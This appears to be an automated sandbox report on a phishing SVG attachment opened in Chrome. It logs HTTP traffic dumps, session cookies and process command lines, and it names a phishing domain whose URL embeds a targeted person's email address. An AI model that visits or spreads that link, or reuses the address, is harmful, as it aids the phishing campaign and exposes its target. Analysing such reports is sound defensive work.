                                    2025-03-24 06:19:30 UTC1369INData Raw: 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f
                                    Data Ascii: FpO++oO++oOOFpO++oOOFpO++oO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpO++oOOFpOOFpO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oOOFpO++oOOFpO++oOOFpO++oO++oO++oO++oOOFpO++oO
                                    2025-03-24 06:19:30 UTC1369INData Raw: 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f
                                    Data Ascii: pOOFpOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOO
                                    2025-03-24 06:19:30 UTC1369INData Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b
                                    Data Ascii: O++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.2460836151.101.194.1374433600C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-03-24 06:19:31 UTC665OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                    Host: code.jquery.com
                                    Connection: keep-alive
                                    sec-ch-ua-platform: "Windows"
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                    sec-ch-ua-mobile: ?0
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Sec-Fetch-Storage-Access: active
                                    Referer: https://mo.zonqdkqezktw.es/
                                    Accept-Encoding: gzip, deflate, br, zstd
                                    Accept-Language: en-US,en;q=0.9
                                    2025-03-24 06:19:31 UTC564INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Length: 89501
                                    Server: nginx
                                    Content-Type: application/javascript; charset=utf-8
                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                    ETag: "28feccc0-15d9d"
                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Accept-Ranges: bytes
                                    Date: Mon, 24 Mar 2025 06:19:31 GMT
                                    Via: 1.1 varnish
                                    Age: 1466154
                                    X-Served-By: cache-lga21950-LGA
                                    X-Cache: HIT
                                    X-Cache-Hits: 582
                                    X-Timer: S1742797172.950762,VS0,VE0
                                    Vary: Accept-Encoding
                                    2025-03-24 06:19:32 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                    2025-03-24 06:19:32 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                    2025-03-24 06:19:32 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                    2025-03-24 06:19:32 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                    2025-03-24 06:19:32 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                    2025-03-24 06:19:32 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.2460835104.21.80.14433600C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-03-24 06:19:32 UTC1351OUTGET /favicon.ico HTTP/1.1
                                    Host: mo.zonqdkqezktw.es
                                    Connection: keep-alive
                                    sec-ch-ua-platform: "Windows"
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                    sec-ch-ua-mobile: ?0
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.com
                                    Accept-Encoding: gzip, deflate, br, zstd
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: XSRF-TOKEN=eyJpdiI6InB6Y2JUNkJ5NXBpYlFQQmdoQ1dIVnc9PSIsInZhbHVlIjoidTJEblVVM1dlbHplTlhLcHQrM0JDK2FiaFQ2YVhMOVhMTzYzczZiSVJzN2IzOWRHQStoWmZOOUNFNHFQL2JIYjE2MGFJY09CWTVjbE1tM2hMemttMzdTdENLODNBU2RZdVQ0MklRT1ZUcXdheG1NeEFPcGx2Z2k1bG40YzFTTnMiLCJtYWMiOiJkNjlhODY5NWI2OTZhMTMzYmY5NTA2NmZhY2M0MjNkYTAzYjRlZTJjYzQwZTQ0MmFkZTc2ZmQ0NjI1YmU0YWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjBMMWhLN1c0Nyt4aDlPMlgvU3pwWUE9PSIsInZhbHVlIjoiWmhRcUY0MFRLRTVvSVNXMVM1UDZ4Nmx4dDJIWGhXaFlRNjUxOFZHeUFqV0dUdDRPcmZZdDZ6eEN4aHRLLzlEaXdiNGEyY3R2Rk1BYXluSWdSU1VvOW94alNUek5mV0t0ZmovUlkxaHFNbFp4am1lVUNsa0FrSHhzeUxrNVZCUDIiLCJtYWMiOiI5OWIxYmNhZDIxZjJiNDU3NjFlMDYyMzFmZjUzMzM1MjM0ZGJkMTA4YzY4MGVkZTI3N2M5YTAzYTRjOTNmMTFjIiwidGFnIjoiIn0%3D
                                    2025-03-24 06:19:32 UTC1060INHTTP/1.1 404 Not Found
                                    Date: Mon, 24 Mar 2025 06:19:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    cf-cache-status: MISS
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaX"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Vary: Accept-Encoding
                                    server-timing: cfL4;desc="?proto=TCP&rtt=334&min_rtt=316&rtt_var=124&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2266&delivery_rate=9026785&cwnd=252&unsent_bytes=0&cid=f1e1fc67d8a9b90e&ts=167&x=0"
                                    Cache-Control: max-age=14400
                                    Server: cloudflare
                                    CF-RAY: 92540eb6fafa2142-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=98686&min_rtt=97536&rtt_var=21740&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1923&delivery_rate=38157&cwnd=249&unsent_bytes=0&cid=0740d767012a2c32&ts=2107&x=0"
                                    2025-03-24 06:19:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.246083935.190.80.14433600C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-03-24 06:19:32 UTC545OUTOPTIONS /report/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaX HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Origin: https://mo.zonqdkqezktw.es
                                    Access-Control-Request-Method: POST
                                    Access-Control-Request-Headers: content-type
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br, zstd
                                    Accept-Language: en-US,en;q=0.9
                                    2025-03-24 06:19:33 UTC336INHTTP/1.1 200 OK
                                    Content-Length: 0
                                    access-control-max-age: 86400
                                    access-control-allow-methods: OPTIONS, POST
                                    access-control-allow-origin: *
                                    access-control-allow-headers: content-length, content-type
                                    date: Mon, 24 Mar 2025 06:19:32 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.246084035.190.80.14433600C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-03-24 06:19:33 UTC520OUTPOST /report/v4?s=Uun%2BxGZQ51yblYIFmruPNj8lKOgKuUQ5kLkzGqYNzI7xHwz6eih1ATQCYenedh2K7ZGTGxTzpGIxxCS2TGeRcIcH6L4%2B%2BjEMFU8%2BmhE0R4MqrPmzHy5XqIam0XAFvjSyhJaX HTTP/1.1
                                    Host: a.nel.cloudflare.com
                                    Connection: keep-alive
                                    Content-Length: 453
                                    Content-Type: application/reports+json
                                    Origin: https://mo.zonqdkqezktw.es
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                    Accept-Encoding: gzip, deflate, br, zstd
                                    Accept-Language: en-US,en;q=0.9
                                    2025-03-24 06:19:33 UTC453OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 31 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 2e 7a 6f 6e 71 64 6b 71 65 7a 6b 74 77 2e 65 73 2f 38 56 56 67 6c 37 2f 24 63 68 72 69 73 74 6f 40 64 72 61 66 74 77 6f 72 78 2e 63 6f 6d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 30 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c
                                    Data Ascii: [{"age":0,"body":{"elapsed_time":311,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://mo.zonqdkqezktw.es/8VVgl7/$christo@draftworx.com","sampling_fraction":1.0,"server_ip":"104.21.80.1","status_code":404,"type":"http.error"},
                                    2025-03-24 06:19:33 UTC214INHTTP/1.1 200 OK
                                    Content-Length: 0
                                    access-control-allow-origin: *
                                    vary: Origin
                                    date: Mon, 24 Mar 2025 06:19:33 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    050100150200s020406080100

                                    Click to jump to process

                                    050100150200s0.0050100MB

                                    Click to jump to process

                                    Target ID:0
                                    Start time:02:19:21
                                    Start date:24/03/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                    Imagebase:0x7ff6ecfc0000
                                    File size:3'384'928 bytes
                                    MD5 hash:DBE43C1D0092437B88CFF7BD9ABC336C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:1
                                    Start time:02:19:22
                                    Start date:24/03/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1908,i,12973504313424572238,13237224200463066613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=1748 /prefetch:11
                                    Imagebase:0x7ff6ecfc0000
                                    File size:3'384'928 bytes
                                    MD5 hash:DBE43C1D0092437B88CFF7BD9ABC336C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:6
                                    Start time:02:19:29
                                    Start date:24/03/2025
                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg"
                                    Imagebase:0x7ff6ecfc0000
                                    File size:3'384'928 bytes
                                    MD5 hash:DBE43C1D0092437B88CFF7BD9ABC336C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    No disassembly